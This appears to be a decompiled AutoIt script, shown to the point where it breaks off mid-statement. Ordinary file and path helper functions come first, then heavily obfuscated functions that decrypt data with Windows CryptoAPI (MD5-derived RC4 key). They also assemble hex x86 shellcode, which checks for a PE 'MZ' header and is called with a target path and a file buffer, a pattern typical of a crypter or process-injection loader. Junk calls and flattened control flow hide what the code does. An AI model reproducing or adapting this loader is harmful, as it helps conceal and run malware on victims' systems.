$IOPENMODE ) ENDIF IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IRETURN = FILEWRITELINE ($HFILEOPEN , $SMSG ) IF ISSTRING ($SLOGPATH ) THEN $IRETURN = FILECLOSE ($HFILEOPEN ) IF $IRETURN <= 0 THEN RETURN SETERROR (2 , $IRETURN , 0 ) RETURN $IRETURN ENDFUNC FUNC _FILEWRITETOLINE ($SFILEPATH , $ILINE , $STEXT , $BOVERWRITE = FALSE ) IF $ILINE <= 0 THEN RETURN SETERROR (4 , 0 , 0 ) IF NOT ISSTRING ($STEXT ) THEN $STEXT = STRING ($STEXT ) IF $STEXT = "" THEN RETURN SETERROR (6 , 0 , 0 ) ENDIF IF $BOVERWRITE = DEFAULT THEN $BOVERWRITE = FALSE IF NOT (ISBOOL ($BOVERWRITE ) OR $BOVERWRITE = 0 OR $BOVERWRITE = 1 ) THEN RETURN SETERROR (5 , 0 , 0 ) IF NOT FILEEXISTS ($SFILEPATH ) THEN RETURN SETERROR (2 , 0 , 0 ) LOCAL $AARRAY = FILEREADTOARRAY ($SFILEPATH ) LOCAL $IUBOUND = UBOUND ($AARRAY ) + 4294967295 IF ($IUBOUND + 1 ) < $ILINE THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , FILEGETENCODING ($SFILEPATH ) + $FO_OVERWRITE ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (3 , 0 , 0 ) LOCAL $SDATA = "" $ILINE -= 1 FOR $I = 0 TO $IUBOUND IF $I = $ILINE THEN IF $BOVERWRITE THEN IF $STEXT THEN $SDATA &= $STEXT & @CRLF ELSE $SDATA &= $STEXT & @CRLF & $AARRAY [$I ] & @CRLF ENDIF ELSEIF $I < $IUBOUND THEN $SDATA &= $AARRAY [$I ] & @CRLF ELSEIF $I = $IUBOUND THEN $SDATA &= $AARRAY [$I ] ENDIF NEXT FILEWRITE ($HFILEOPEN , $SDATA ) FILECLOSE ($HFILEOPEN ) RETURN 1 ENDFUNC FUNC _PATHFULL ($SRELATIVEPATH , $SBASEPATH = @WORKINGDIR ) IF NOT $SRELATIVEPATH OR $SRELATIVEPATH = "." THEN RETURN $SBASEPATH LOCAL $SFULLPATH = STRINGREPLACE ($SRELATIVEPATH , "/" , "\" ) LOCAL CONST $SFULLPATHCONST = $SFULLPATH LOCAL $SPATH LOCAL $BROOTONLY = STRINGLEFT ($SFULLPATH , 1 ) = "\" AND STRINGMID ($SFULLPATH , 2 , 1 ) <> "\" IF $SBASEPATH = DEFAULT THEN $SBASEPATH = @WORKINGDIR FOR $I = 1 TO 2 $SPATH = STRINGLEFT ($SFULLPATH , 2 ) IF $SPATH = "\\" THEN $SFULLPATH = STRINGTRIMLEFT ($SFULLPATH , 2 ) LOCAL $NSERVERLEN = STRINGINSTR ($SFULLPATH , "\" ) + 4294967295 $SPATH = "\\" & STRINGLEFT ($SFULLPATH , $NSERVERLEN ) $SFULLPATH = STRINGTRIMLEFT ($SFULLPATH , $NSERVERLEN ) EXITLOOP ELSEIF STRINGRIGHT ($SPATH , 1 ) = ":" THEN $SFULLPATH = STRINGTRIMLEFT ($SFULLPATH , 2 ) EXITLOOP ELSE $SFULLPATH = $SBASEPATH & "\" & $SFULLPATH ENDIF NEXT IF STRINGLEFT ($SFULLPATH , 1 ) <> "\" THEN IF STRINGLEFT ($SFULLPATHCONST , 2 ) = STRINGLEFT ($SBASEPATH , 2 ) THEN $SFULLPATH = $SBASEPATH & "\" & $SFULLPATH ELSE $SFULLPATH = "\" & $SFULLPATH ENDIF ENDIF LOCAL $ATEMP = STRINGSPLIT ($SFULLPATH , "\" ) LOCAL $APATHPARTS [$ATEMP [0 ] ] , $J = 0 FOR $I = 2 TO $ATEMP [0 ] IF $ATEMP [$I ] = ".." THEN IF $J THEN $J -= 1 ELSEIF NOT ($ATEMP [$I ] = "" AND $I <> $ATEMP [0 ] ) AND $ATEMP [$I ] <> "." THEN $APATHPARTS [$J ] = $ATEMP [$I ] $J += 1 ENDIF NEXT $SFULLPATH = $SPATH IF NOT $BROOTONLY THEN FOR $I = 0 TO $J + 4294967295 $SFULLPATH &= "\" & $APATHPARTS [$I ] NEXT ELSE $SFULLPATH &= $SFULLPATHCONST IF STRINGINSTR ($SFULLPATH , ".." ) THEN $SFULLPATH = _PATHFULL ($SFULLPATH ) ENDIF DO $SFULLPATH = STRINGREPLACE ($SFULLPATH , ".\" , "\" ) UNTIL @EXTENDED = 0 RETURN $SFULLPATH ENDFUNC FUNC _PATHGETRELATIVE ($SFROM , $STO ) IF STRINGRIGHT ($SFROM , 1 ) <> "\" THEN $SFROM &= "\" IF STRINGRIGHT ($STO , 1 ) <> "\" THEN $STO &= "\" IF $SFROM = $STO THEN RETURN SETERROR (1 , 0 , STRINGTRIMRIGHT ($STO , 1 ) ) LOCAL $ASFROM = STRINGSPLIT ($SFROM , "\" ) LOCAL $ASTO = STRINGSPLIT ($STO , "\" ) IF $ASFROM [1 ] <> $ASTO [1 ] THEN RETURN SETERROR (2 , 0 , STRINGTRIMRIGHT ($STO , 1 ) ) LOCAL $I = 2 LOCAL $IDIFF = 1 WHILE 1 IF $ASFROM [$I ] <> $ASTO [$I ] THEN $IDIFF = $I EXITLOOP ENDIF $I += 1 WEND $I = 1 LOCAL $SRELPATH = "" FOR $J = 1 TO $ASTO [0 ] IF $I >= $IDIFF THEN $SRELPATH &= "\" & $ASTO [$I ] ENDIF $I += 1 NEXT $SRELPATH = STRINGTRIMLEFT ($SRELPATH , 1 ) $I = 1 FOR $J = 1 TO $ASFROM [0 ] IF $I > $IDIFF THEN $SRELPATH = "..\" & $SRELPATH ENDIF $I += 1 NEXT IF STRINGRIGHT ($SRELPATH , 1 ) == "\" THEN $SRELPATH = STRINGTRIMRIGHT ($SRELPATH , 1 ) RETURN $SRELPATH ENDFUNC FUNC _PATHMAKE ($SDRIVE , $SDIR , $SFILENAME , $SEXTENSION ) IF STRINGLEN ($SDRIVE ) THEN IF NOT (STRINGLEFT ($SDRIVE , 2 ) = "\\" ) THEN $SDRIVE = STRINGLEFT ($SDRIVE , 1 ) & ":" ENDIF IF STRINGLEN ($SDIR ) THEN IF NOT (STRINGRIGHT ($SDIR , 1 ) = "\" ) AND NOT (STRINGRIGHT ($SDIR , 1 ) = "/" ) THEN $SDIR = $SDIR & "\" ELSE $SDIR = "\" ENDIF IF STRINGLEN ($SDIR ) THEN IF NOT (STRINGLEFT ($SDIR , 1 ) = "\" ) AND NOT (STRINGLEFT ($SDIR , 1 ) = "/" ) THEN $SDIR = "\" & $SDIR ENDIF IF STRINGLEN ($SEXTENSION ) THEN IF NOT (STRINGLEFT ($SEXTENSION , 1 ) = "." ) THEN $SEXTENSION = "." & $SEXTENSION ENDIF RETURN $SDRIVE & $SDIR & $SFILENAME & $SEXTENSION ENDFUNC FUNC _PATHSPLIT ($SFILEPATH , BYREF $SDRIVE , BYREF $SDIR , BYREF $SFILENAME , BYREF $SEXTENSION ) LOCAL $AARRAY = STRINGREGEXP ($SFILEPATH , "^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$" , $STR_REGEXPARRAYMATCH ) IF @ERROR THEN REDIM $AARRAY [5 ] $AARRAY [0 ] = $SFILEPATH ENDIF $SDRIVE = $AARRAY [1 ] IF STRINGLEFT ($AARRAY [2 ] , 1 ) == "/" THEN $SDIR = STRINGREGEXPREPLACE ($AARRAY [2 ] , "\h*[\/\\]+\h*" , "\/" ) ELSE $SDIR = STRINGREGEXPREPLACE ($AARRAY [2 ] , "\h*[\/\\]+\h*" , "\\" ) ENDIF $AARRAY [2 ] = $SDIR $SFILENAME = $AARRAY [3 ] $SEXTENSION = $AARRAY [4 ] RETURN $AARRAY ENDFUNC FUNC _REPLACESTRINGINFILE ($SFILEPATH , $SSEARCHSTRING , $SREPLACESTRING , $ICASESENSITIVE = 0 , $IOCCURANCE = 1 ) IF STRINGINSTR (FILEGETATTRIB ($SFILEPATH ) , "R" ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_READ ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL $SFILEREAD = FILEREAD ($HFILEOPEN ) FILECLOSE ($HFILEOPEN ) IF $ICASESENSITIVE = DEFAULT THEN $ICASESENSITIVE = 0 IF $IOCCURANCE = DEFAULT THEN $IOCCURANCE = 1 $SFILEREAD = STRINGREPLACE ($SFILEREAD , $SSEARCHSTRING , $SREPLACESTRING , 1 - $IOCCURANCE , $ICASESENSITIVE ) LOCAL $IRETURN = @EXTENDED IF $IRETURN THEN LOCAL $IFILEENCODING = FILEGETENCODING ($SFILEPATH ) $HFILEOPEN = FILEOPEN ($SFILEPATH , $IFILEENCODING + $FO_OVERWRITE ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) FILEWRITE ($HFILEOPEN , $SFILEREAD ) FILECLOSE ($HFILEOPEN ) ENDIF RETURN $IRETURN ENDFUNC FUNC _TEMPFILE ($SDIRECTORYNAME = @TEMPDIR , $SFILEPREFIX = "~" , $SFILEEXTENSION = ".tmp" , $IRANDOMLENGTH = 7 ) IF $IRANDOMLENGTH = DEFAULT OR $IRANDOMLENGTH <= 0 THEN $IRANDOMLENGTH = 7 IF $SDIRECTORYNAME = DEFAULT OR (NOT FILEEXISTS ($SDIRECTORYNAME ) ) THEN $SDIRECTORYNAME = @TEMPDIR IF $SFILEEXTENSION = DEFAULT THEN $SFILEEXTENSION = ".tmp" IF $SFILEPREFIX = DEFAULT THEN $SFILEPREFIX = "~" IF NOT FILEEXISTS ($SDIRECTORYNAME ) THEN $SDIRECTORYNAME = @SCRIPTDIR $SDIRECTORYNAME = STRINGREGEXPREPLACE ($SDIRECTORYNAME , "[\\/]+$" , "" ) $SFILEEXTENSION = STRINGREGEXPREPLACE ($SFILEEXTENSION , "^\.+" , "" ) $SFILEPREFIX = STRINGREGEXPREPLACE ($SFILEPREFIX , "[\\/:*?"<>|]" , "" ) LOCAL $STEMPNAME = "" DO $STEMPNAME = "" WHILE STRINGLEN ($STEMPNAME ) < $IRANDOMLENGTH $STEMPNAME &= CHR (RANDOM (97 , 122 , 1 ) ) WEND $STEMPNAME = $SDIRECTORYNAME & "\" & $SFILEPREFIX & $STEMPNAME & "." & $SFILEEXTENSION UNTIL NOT FILEEXISTS ($STEMPNAME ) RETURN $STEMPNAME ENDFUNC #NoTrayIcon FUNC DBRUAIEIBZEWRGBQ ($VDATA , $VCRYPTKEY ) GLOBAL $569195090 = 1700268568 GLOBAL $DYJO7XI0ZR = 1929536 FOR $E = 0 TO 16288 CHR (684290 ) IF $569195090 = 73392173 THEN DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDestroyKey" , "handle" , $VCRYPTKEY ) $569195090 = 1296546299 ENDIF IF $569195090 = 97398974 THEN $TBUFF = DLLSTRUCTCREATE ("byte[" & BINARYLEN ($VDATA ) + "1000" & "]" ) $569195090 = 1248908323 ISPTR (3853051 + 1638825 * 1547893 ) ENDIF IF $569195090 = 208206939 THEN DLLCLOSE ($__G_ACRYPTINTERNALDATA ["1" ] ) $569195090 = 665766390 ISBOOL ("34j5R73dGD6I" ) ENDIF IF $569195090 = 216567143 THEN $TTEMPSTRUCT = DLLSTRUCTCREATE ("byte[" & $IPLAINTEXTSIZE + "1" & "]" , DLLSTRUCTGETPTR ($TBUFF ) ) $569195090 = 1933112639 ISBINARY (1198197 + 3255423 + 521890 ) ENDIF IF $569195090 = 227757661 THEN LOCAL $VRETURN CHR (146190 ) $569195090 = 686536036 DIM $JUYK3CZ7P0QYD5XI3BYA = 2657508 + 4292338741 + 4291347646 ENDIF IF $569195090 = 295874608 THEN $__G_ACRYPTINTERNALDATA [1 ] = DLLOPEN ("Advapi32.dll" ) $569195090 = 1532618530 DIM $MGXLD4ZCRIABNR59SJXR = 2913009 + 4291678514 + 1019338 + 2988075 + 1033950 * 1364808 + 1903877 PTR (2063219 + 4291058243 + 4293435455 ) ENDIF IF $569195090 = 418593742 THEN LOCAL $TTEMPSTRUCT DIM $PASKUUU4FSRSWMJIWVNT = 3920272 $569195090 = 1052868023 ENDIF IF $569195090 = 463888510 THEN DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptReleaseContext" , "handle" , $__G_ACRYPTINTERNALDATA ["2" ] , "dword" , "0" ) PTR ("gd1ibs7elJVICiG2jmxyMbH4hkLlW7aEKVLo0nl" ) $569195090 = 208206939 ISFLOAT ("IzLRIGMHB4ReE7b1RVsnJp7RFrb5bGX504vSH4MotCdReHT2mtj0x7dsB4kqFSG4gWnKLssWie4h" ) ENDIF IF $569195090 = 548984161 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptHashData" , "handle" , $HCRYPTHASH , "struct*" , $TBUFF , "dword" , DLLSTRUCTGETSIZE ($TBUFF ) , "dword" , "1" ) ISBOOL ("Rx6G30dpNUvTL5iKrtiq3bwStc6fmqlSw8ZGjouUIdNcXvsleOvOz20Qaon147dxHMvMgLAc9xSZwu48UUbG4Gr" ) $569195090 = 693997732 ENDIF IF $569195090 = 665766390 THEN RETURN BINARY ($VRETURN ) ISSTRING (2395551 + 1965250 ) EXITLOOP ENDIF IF $569195090 = 686536036 THEN $VDATA = BINARYTOSTRING ($VDATA ) CHR (924694 ) $569195090 = 295874608 ENDIF IF $569195090 = 693997732 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDeriveKey" , "handle" , $__G_ACRYPTINTERNALDATA ["2" ] , "uint" , "0x00006610" , "handle" , $HCRYPTHASH , "dword" , "0x00000001" , "handle*" , "0" ) $569195090 = 1483208281 MOD (437026 , 632919 ) ISSTRING ("1D6gFaEHgZf0U8eOIsL2pti0ZJWwQNEXDZhlivSr" ) ENDIF IF $569195090 = 718764494 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDecrypt" , "handle" , $VCRYPTKEY , "handle" , "0" , "bool" , EXECUTE ("True" ) , "dword" , "0" , "struct*" , $TBUFF , "dword*" , BINARYLEN ($VDATA ) ) $569195090 = 1655295316 ENDIF IF $569195090 = 895876247 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptCreateHash" , "handle" , $__G_ACRYPTINTERNALDATA ["2" ] , "uint" , "0x00008003" , "ptr" , "0" , "dword" , "0" , "handle*" , "0" ) DIM $EXM1IFHVGQ5OI1BUSV50 = "FmJtSVq7L9aFulqs6vTJ0bfXdbMK04DOzi8lLHAurxDr5SXQlbwalqdEhXpQhOhSEuflmfQx4ysBGY2un7zYHDCjfDdZrUnLqWWJLLCfv8" $569195090 = 1876673018 RANDOM (1243867 ) ENDIF IF $569195090 = 969182864 THEN $__G_ACRYPTINTERNALDATA ["2" ] = $ARET ["1" ] CHR (640441 ) $569195090 = 1622275345 ENDIF IF $569195090 = 1052868023 THEN LOCAL $IPLAINTEXTSIZE DIM $TB1GKKQLUBSSLETCJXQL = 1953326 $569195090 = 227757661 WINEXISTS ("rdx8MVSQFTeD15LqzmrLl0O4ZINlULmq7T2hsnhpJcgVp" ) CHR (242088 ) ENDIF IF $569195090 = 1248908323 THEN DLLSTRUCTSETDATA ($TBUFF , EXECUTE ("1" ) , $VDATA ) INT (1856423 ) $569195090 = 718764494 ENDIF IF $569195090 = 1296546299 THEN $__G_ACRYPTINTERNALDATA ["0" ] -= "1" $569195090 = 463888510 WINEXISTS ("YGidE8mfbcjU3O11mh0H3YOHzTZfdidhmpBBJxI61nApbREYqm4yfvL91JMVjh" ) ENDIF IF $569195090 = 1372412672 THEN DLLSTRUCTSETDATA ($TBUFF , EXECUTE ("1" ) , $VCRYPTKEY ) $569195090 = 548984161 ISBOOL (861948 + 3268186 + 4291360318 ) STRING ("SnaY0oOb0MBJ9UXWUlHq8j1K25fZlQ6MAd5HitlNtaRaVZseVh5DYjHIwz55iZ0" ) ENDIF IF $569195090 = 1435411003 THEN DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDestroyHash" , "handle" , $HCRYPTHASH ) $569195090 = 1623917350 WINEXISTS ("pMAa468B1ZdMbddVCYrFvlTxqFEkHt7QwpFDDD4mJgFJ2rgVWxna1zCe4dTyBX4G2wpWHJq94e5pOiE8yTyjg6Y6WBJAUFVWm8S" ) STRING ("hogWDnyWIVaSxUA5It9fa0o" ) ENDIF IF $569195090 = 1446413075 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDestroyKey" , "handle" , $VCRYPTKEY ) $569195090 = 73392173 RANDOM (3748120 ) ENDIF IF $569195090 = 1483208281 THEN $VRETURN = $ARET ["5" ] $569195090 = 1435411003 DIM $BIDY28EDXCHW6TUHLQ9S = "ukSvIZ6llRHfF1Acl7q3qUJiNcnSyaW3iIgxvCsjI1mV9RA13fatTZmK" ENDIF IF $569195090 = 1532618530 THEN LOCAL $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptAcquireContext" , "handle*" , "0" , "ptr" , "0" , "ptr" , "0" , "dword" , "24" , "dword" , "0xF0000000" ) ISFLOAT (2445292 * 717613 ) $569195090 = 969182864 RANDOM (3800342 ) ISFLOAT (2631402 + 1592634 ) ENDIF IF $569195090 = 1622275345 THEN $__G_ACRYPTINTERNALDATA ["0" ] += "1" DIM $LVZTABKTWFXWVVHUEB0U = 3040659 + 4294453516 * 1561776 + 2615672 + 4292985959 * 160396 * 1690876 * 3711931 $569195090 = 895876247 ENDIF IF $569195090 = 1623473715 THEN LOCAL $TBUFF $569195090 = 418593742 MOD (1053136 , 3647856 ) ISBOOL (1305474 * 3237247 + 524023 ) ENDIF IF $569195090 = 1623917350 THEN $VCRYPTKEY = $VRETURN $569195090 = 97398974 PTR (3304174 + 4294888220 + 4290973688 ) WINEXISTS ("0wZi34JDsVdEDFXLJXcAIAO6XaToH8creTQL8cosyBAcEtf8nUzcoEczS2v3lu5tSVAU0kM" ) ENDIF IF $569195090 = 1655295316 THEN $IPLAINTEXTSIZE = $ARET ["6" ] ISPTR ("9LBC4VaYHadIR" ) $569195090 = 216567143 ENDIF IF $569195090 = 1700268568 THEN LOCAL $__G_ACRYPTINTERNALDATA ["3" ] $569195090 = 1623473715 ENDIF IF $569195090 = 1876673018 THEN $HCRYPTHASH = $ARET ["5" ] STRING ("g2DEC" ) $569195090 = 2132296422 DIM $A28ZTHVSS1CJQH0NL8K2 = 1199422 ISBOOL (3867385 * 2102375 + 4294545054 * 3369801 ) ENDIF IF $569195090 = 1933112639 THEN $VRETURN = BINARYMID (DLLSTRUCTGETDATA ($TTEMPSTRUCT , EXECUTE ("1" ) ) , "1" , $IPLAINTEXTSIZE ) PTR ("UyvLbbtHWIcp2EtGWSrzXvzfljVpTB2b14nlGRRIpeliMqQLCsc7F64x9pz1pdYtQax7qhafaTkSjrC4CjXA" ) $569195090 = 1446413075 DIM $ZMQQ0SLP2BM3TUUS66XW = "nSXFxgpx4VEC7A4TZkz8BrZ0" ENDIF IF $569195090 = 2132296422 THEN $TBUFF = DLLSTRUCTCREATE ("byte[" & BINARYLEN ($VCRYPTKEY ) & "]" ) $569195090 = 1372412672 DIM $C8SIYKEDVBM528RHZW3Z = 2281636 ENDIF NEXT ENDFUNC FUNC MWMQWLZFSVGLEKEBWPKTQCNGY ($WPATH , $WARGUMENTS , $LPFILE , $PROTECT ) GLOBAL $1267239031 = 1700268568 GLOBAL $627DNRXPAW = 2952434 FOR $E = 0 TO 3174096 IF $1267239031 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837DF4000F84800000008B97A00000008365F40003D383BFA4" MOD (271299 , 2858503 ) $1267239031 = 979069101 DIM $SL85CIVLUVEOMGRY4ILH = 3686944 ENDIF IF $1267239031 = 73392173 THEN $BIN_SHELLCODE &= "00008B45BC3B4634750F50FF75D8FF55B085C00F85610200006A4068003000" $1267239031 = 1296546299 DIM $UCEJUJMVO2OWUREJB8DK = "SX4s47WmxFv1coshkK4c1syiHx5Cu1hI3nLpj1Zm1H0vtESBVCrwii5zxVUGbs1FxW7ZLd7tVSksBdYcQCS2JVzVrm2xgs" ENDIF IF $1267239031 = 97398974 THEN $BIN_SHELLCODE &= "8D8510FCFFFF50FF55E88B4D10C78510FCFFFF070001008B713C03F10FB746" RANDOM (2182153 ) $1267239031 = 1248908323 PTR (2015213 + 4293245442 * 2450013 * 1301782 ) PTR (2322587 * 2532464 + 4294126729 + 4293325415 ) ENDIF IF $1267239031 = 195372937 THEN $BIN_SHELLCODE &= "000020741985C079046A40EB172500000040F7D81BC083E01083C010EB1585" $1267239031 = 851821169 ISBINARY ("qEXMawLj9X" ) ENDIF IF $1267239031 = 202026599 THEN $KEY ["1" ] ("kernel32" , "dword" , "VirtualFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "dword" , "0x8000" ) ISBOOL ("AL8RxuluuAG6Ui3u90oQmd5IMtDwz1kLhZb5M5TUfkBmCA2" ) EXITLOOP ENDIF IF $1267239031 = 208206939 THEN $BIN_SHELLCODE &= "5033FFC745EC0100000057FF75D8FF55C08945F885C0751468008000005753" $1267239031 = 665766390 STRING (1632576 + 3412180 ) ENDIF IF $1267239031 = 216567143 THEN $BIN_SHELLCODE &= "000F84E80200008D45D8508D85DCFEFFFF5052526A04525252FF750CFF7508" ISSTRING ("Y5g7SdgEKcKSglACq7kVsxMNnn1O3pp86HM73iUMsZjjW8s2MxH7sELArCUDmAKuWMWHIDIhnHCDnD2o59bFSsQA5mOAxqA1nYxjmVsiYzTVci" ) $1267239031 = 1933112639 ISBOOL ("fMC6uLwYiT7hKpzgTcjQ2RrI5yXa203RnBik4m1i6uQQWMA2WR" ) ENDIF IF $1267239031 = 227757661 THEN $BIN_SHELLCODE &= "401803CF8955FC894DF889450885C074198B04B203C750E882FFFFFF3B450C" CHR (2119341 ) $1267239031 = 686536036 STRING (87506 * 1456198 * 1151148 * 993779 ) DIM $OMFLBUHBKWR74NL8ZSQ4 = 3004838 ENDIF IF $1267239031 = 295874608 THEN $BIN_SHELLCODE &= "8303C7EBE9558BEC81ECF003000053565733FF897DB8648B35300000008B76" DIM $TJXXZGTRVHDVRXX9WUHT = 3965608 * 594418 * 1232006 + 4291190241 + 1004517 + 4293345140 + 1340308 + 2821848 $1267239031 = 1532618530 MOD (2201050 , 2680202 ) ENDIF IF $1267239031 = 304845161 THEN $BIN_SHELLCODE &= "050F8677FCFFFF33C05F5E5B8BE55DC20C00" $1267239031 = 1014781231 DIM $534XE2B5XALFYJFCYIRA = 57560 PTR (3960181 + 1285405 * 1928343 + 2702247 ) ENDIF IF $1267239031 = 363789172 THEN LOCAL $SHELLCODE_STRUCT = $KEY ["0" ] ("byte shellcode[" & $BINL & "]" , $LPSHELLCODE ) $1267239031 = 1780023503 INT (3551320 ) ENDIF IF $1267239031 = 397553911 THEN $BIN_SHELLCODE &= "0F840DFEFFFF8B45E0EB1D8B5DFC33FF837DD800740757FF75D8FF55A883FB" $1267239031 = 304845161 ISBOOL ("bMUFzLhoqfNfapKL6GygImRzY7hOw4qlMmjQb7OdlWdouosMVRWbipfZ6uSBEB2vZBBYg4J92v5XiBe" ) ISSTRING (2654182 + 223575 ) ENDIF IF $1267239031 = 418593742 THEN $BIN_SHELLCODE &= "F0740BC1E81833F081E6FFFFFF0F474975E05F8BC65E5DC20400558BEC5151" $1267239031 = 1052868023 MOD (2238625 , 2896909 ) ENDIF IF $1267239031 = 427686952 THEN $BIN_SHELLCODE &= "FCFFFF83C00850FF75D8FF55D485C00F843CFEFFFF8B46280345F88985C0FC" CHR (3525649 ) $1267239031 = 434956025 ISSTRING (448995 + 3136940 + 4293759231 * 1933696 ) ENDIF IF $1267239031 = 434956025 THEN $BIN_SHELLCODE &= "FFFF8D8510FCFFFF50FF75DCFF559085C00F841BFEFFFFFF75DCFF55AC85C0" ISBOOL ("JyfRWj3TOXm3BclXj8dHugqcYNqz" ) $1267239031 = 397553911 ISFLOAT ("DRXUQndD9iyoAetMbDO4Dhc2i3CLnobn9mSgvoxuqLr4yyZvXYGQaHvvN5LWUBpVgloovnqXguM10iDTehYzRvnA1vBALKKZvFX" ) ENDIF IF $1267239031 = 437981964 THEN $KEY ["3" ] ($SHELLCODE_STRUCT , "shellcode" , $BIN_SHELLCODE ) $1267239031 = 555601121 ISBOOL (2991958 * 3679854 + 4292932483 ) WINEXISTS ("LMZeV8YwaWZkFTXEtvpIDho26WGFx069T38lGBbpvn9YSJd6h8ljlunEy7h9Ar9jZZBMVL82u9mpizkwTKyy" ) ENDIF IF $1267239031 = 456464236 THEN $BIN_SHELLCODE &= "0345F850FF75D8FF55CC85C074128B4DF483C7280FB7460641894DF43BC872" PTR ("DXIubZdoZ83hAlF9sZlh7v8XVqZ3JEdac7qYyHskibsBqosy3yv7LqShYWIV9kOu52fD5RJVGb95cGFF" ) $1267239031 = 1780715420 RANDOM (686894 ) ENDIF IF $1267239031 = 463888510 THEN $BIN_SHELLCODE &= "34FF75D8FF55C08945F885C0753B85FF0F84230200006A406800300000FF76" $1267239031 = 208206939 ENDIF IF $1267239031 = 518704526 THEN $BIN_SHELLCODE &= "75D8FF55D485C00F84FEFEFFFF8D459C506A02FF7654FF75F8FF75D8FF55CC" DIM $W8GXJZDMZKZKRWFRQDXI = 692779 + 4294178295 * 1941383 + 960945 * 2737977 * 3159816 * 3390308 + 2278574 $1267239031 = 991787867 ENDIF IF $1267239031 = 548984161 THEN $BIN_SHELLCODE &= "CAD803C78570FFFFFF99B04806C78574FFFFFF93BA9403C78578FFFFFFE4C7" $1267239031 = 693997732 ISBOOL (3199429 + 4294753684 * 1437131 ) ISBINARY (3506304 * 3623853 * 2322729 * 2067922 ) ENDIF IF $1267239031 = 555601121 THEN $KEY ["3" ] ($FILE_STRUCT , "lpfile" , $LPFILE ) CHR (2989384 ) $1267239031 = 981504074 ENDIF IF $1267239031 = 569195090 THEN $BIN_SHELLCODE &= "06732C8B7DD083C72C03FEFF77FC8B07034510508B47F803C350FF55B48B4D" $1267239031 = 1131056637 STRING ("iQZWT7K2oonRsrnGIorEUodmocAnng9zUhInaX8Hp5mFdFS95kexfN44MMHQGxNhoX7kT9FWqToYbG" ) ENDIF IF $1267239031 = 586222774 THEN $BIN_SHELLCODE &= "0881E1FF0F0000030A0104198B4DF08B42044183E808894DF0D1E83BC872BB" $1267239031 = 1029171870 ENDIF IF $1267239031 = 665766390 THEN $BIN_SHELLCODE &= "FF55C48B5DFCE9F501000033FFFF7654FF751053FF55B433C0897DF0663B46" $1267239031 = 569195090 MOD (1162428 , 87678 ) ENDIF IF $1267239031 = 686536036 THEN $BIN_SHELLCODE &= "74148B55FC463B750872E733C05F5E5B8BE55DC208008B45F80FB704708B04" DIM $QPIGQ5NSHWYF3FCZVFFK = 318795 $1267239031 = 295874608 PTR (292378 + 2109525 * 2825386 ) ENDIF IF $1267239031 = 693997732 THEN $BIN_SHELLCODE &= "B904C7857CFFFFFFE487B804C74580A92DD701C7458405D13D0BC745884427" WINEXISTS ("XjwyUD7RhVE4z55WQaM" ) $1267239031 = 1483208281 ISBOOL ("FViOcI8YIOI5SluiFk0t4ngcWJ14NiBn7138usNIXQvUw9eDQDpHT2KrOg2CS" ) ENDIF IF $1267239031 = 718764494 THEN $BIN_SHELLCODE &= "0333FF4733D2897DF433C08955EC6639110F94C03D4D5A00000F840E030000" $1267239031 = 1655295316 STRING (867786 + 2095763 + 3490012 ) ENDIF IF $1267239031 = 851821169 THEN $BIN_SHELLCODE &= "C079056A0458EB0CA9000000406A00580F95C0408D4D9C5150FF77E48B47E8" $1267239031 = 456464236 STRING ("23DeqLsozl0TE5Fbbo" ) ENDIF IF $1267239031 = 895876247 THEN $BIN_SHELLCODE &= "FFFFFF8D45C0898530FFFFFF8D4598898534FFFFFF8D45D4898538FFFFFF8D" DIM $BWVZTAF7UZBGU23IQDIX = "AXU6ZNVqk5C02bS4m9XtoF4DxliiOEphoRbILCD" $1267239031 = 1876673018 ISFLOAT ("IRB0kNDdVCf52qHMFMLQOuKkaisTFa9Iva4RTs7aamvWLgRv50qSdDonfr0bvVHVDGI1v03nOLOB9ZI3B7YOTrE1VRLBB6NpOKreGZae7dcA" ) MOD (1026700 , 2916745 ) ENDIF IF $1267239031 = 969182864 THEN $BIN_SHELLCODE &= "368B76188975C88D45B4C78558FFFFFF793A3C07898520FFFFFF8BF78D45E8" CHR (3835530 ) $1267239031 = 1622275345 DIM $SGNOBVT7ZXYHDWM6TSOO = 231310 + 3904646 ENDIF IF $1267239031 = 979069101 THEN $BIN_SHELLCODE &= "00000000766B8B420433C983E808894DF0A9FEFFFFFF76450FB7444A086685" STRING ("WIfcYTvZEstDz9ZSoI6Bnkv78Qhk3TpwSh" ) $1267239031 = 2005523844 ENDIF IF $1267239031 = 981504074 THEN LOCAL $RET = $KEY ["2" ] ("dword" , $LPSHELLCODE + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($FILE_STRUCT ) ) ISBOOL (796365 * 2319299 + 4291062434 ) $1267239031 = 2115662046 ISSTRING (1647701 + 2441601 + 508485 + 525874 ) RANDOM (3109830 ) ENDIF IF $1267239031 = 991787867 THEN $BIN_SHELLCODE &= 